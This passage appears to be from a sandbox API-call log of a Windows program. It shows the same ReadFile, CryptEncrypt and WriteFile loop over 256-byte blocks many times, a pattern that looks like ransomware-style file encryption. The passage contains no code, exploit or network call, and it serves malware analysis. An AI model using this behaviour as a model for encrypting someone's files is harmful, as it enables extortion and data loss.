dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.509] GetLastError () returned 0x0 [0170.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.510] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.510] GetLastError () returned 0x0 [0170.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.510] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.510] GetLastError () returned 0x0 [0170.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.510] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.510] GetLastError () returned 0x0 [0170.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.510] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.510] GetLastError () returned 0x0 [0170.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.511] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.511] GetLastError () returned 0x0 [0170.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.511] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.511] GetLastError () returned 0x0 [0170.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.511] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.511] GetLastError () returned 0x0 [0170.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.511] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.511] GetLastError () returned 0x0 [0170.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.512] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.512] GetLastError () returned 0x0 [0170.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.512] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.512] GetLastError () returned 0x0 [0170.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.512] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.512] GetLastError () returned 0x0 [0170.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.512] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.512] GetLastError () returned 0x0 [0170.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.513] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.513] GetLastError () returned 0x0 [0170.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.513] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.513] GetLastError () returned 0x0 [0170.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.513] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.513] GetLastError () returned 0x0 [0170.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.514] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.514] GetLastError () returned 0x0 [0170.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.514] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.514] GetLastError () returned 0x0 [0170.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.514] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.514] GetLastError () returned 0x0 [0170.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.514] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.514] GetLastError () returned 0x0 [0170.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.515] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.515] GetLastError () returned 0x0 [0170.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.515] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.515] GetLastError () returned 0x0 [0170.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.515] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.515] GetLastError () returned 0x0 [0170.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.515] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.515] GetLastError () returned 0x0 [0170.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.516] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.516] GetLastError () returned 0x0 [0170.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.516] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.516] GetLastError () returned 0x0 [0170.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.516] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.516] GetLastError () returned 0x0 [0170.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.516] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.516] GetLastError () returned 0x0 [0170.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.516] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.517] GetLastError () returned 0x0 [0170.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.517] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.517] GetLastError () returned 0x0 [0170.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.517] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.517] GetLastError () returned 0x0 [0170.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.517] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.517] GetLastError () returned 0x0 [0170.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 